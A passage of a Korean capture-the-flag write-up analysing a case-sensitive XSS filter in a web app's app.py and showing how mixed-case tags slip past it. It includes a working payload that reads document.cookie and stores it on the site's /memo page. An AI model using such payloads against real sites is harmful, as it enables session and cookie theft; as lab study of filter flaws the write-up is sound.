먼저 문제파일 속 app.py를 살펴본다.

그 중에서도 코드에서 xss의 취약점을 보자.

def xss_filter(text):
    _filter = ["script", "on", "javascript:"]
    for f in _filter:
        if f in text.lower():
            text = text.replace(f, "")
    return text

• text.lower()로 입력을 소문자로 바꿔서 위험한 단어가 있는지 확인한다.
• text.replace(f, " ")는 위험한 단어가 있으면 원본에서 그 단어를 제거한다.

=> 대소문자가 섞인 키워드는 감지는 되지만 제거되지 않는다. (원본에도 있어야 함.)

즉, 전체 시나리오는 이러하다.

<상황>

• /flag 페이지: FLAG를 얻을 수 있는 곳
• /vuln 페이지: 입력한 내용을 그대로 화면에 보여주는 취약한 페이지
• /memo 페이지: 메모를 저장하고 볼 수 있는 공개 노트

<공격 단계>

1단계: 악성 코드 준비

<ScRiPt>fetch('/memo?memo='+document.cookie)</ScRiPt>

• <ScRiPt>...</ScRiPt>: 브라우저에게 이 안의 코드를 실행해라 라는 의미
• document.cookie: 현재 페이지의 쿠키를 가져온다.
• fetch('/memo?memo='+...): 쿠키를 /memo 페이지에 저장한다.

2단계: 필터 통과

필터는 "script"를 찾지만, "ScRiPt"는 원본에 "script"가 없어 제거되지 않는다.